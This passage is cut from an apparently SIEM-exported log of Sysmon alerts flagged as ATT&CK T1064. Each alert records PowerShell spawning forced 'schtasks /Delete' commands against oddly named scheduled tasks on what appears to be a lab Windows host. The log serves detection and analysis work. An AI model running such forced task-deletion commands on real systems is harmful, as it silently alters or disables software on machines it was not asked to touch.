2020 @ 14:20:04.951",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.501 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107efb2b00} +ProcessId: 3048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.503261200Z"",""eventRecordID"":""3330"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.501\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107efb2b00}\r\nProcessId: 3048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.501"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00107efb2b00}"",""processId"":""3048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.936",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.470 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b1f92b00} +ProcessId: 984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.473310000Z"",""eventRecordID"":""3329"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.470\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b1f92b00}\r\nProcessId: 984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.470"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b1f92b00}"",""processId"":""984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.931",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.437 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010aef62b00} +ProcessId: 5396 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.442676900Z"",""eventRecordID"":""3328"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.437\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010aef62b00}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:34.437"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010aef62b00}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.886",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.406 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109af12b00} +ProcessId: 7760 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.408886100Z"",""eventRecordID"":""3327"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.406\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109af12b00}\r\nProcessId: 7760\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.406"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00109af12b00}"",""processId"":""7760"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.864",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.384 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00} +ProcessId: 6340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.386038700Z"",""eventRecordID"":""3326"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.384\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00}\r\nProcessId: 6340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.384"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010f6ef2b00}"",""processId"":""6340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.828",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.359 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001068ee2b00} 
+ProcessId: 6016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.371761100Z"",""eventRecordID"":""3325"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.359\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-001068ee2b00}\r\nProcessId: 6016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.359"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-001068ee2b00}"",""processId"":""6016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.827",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.286 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00104eec2b00} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 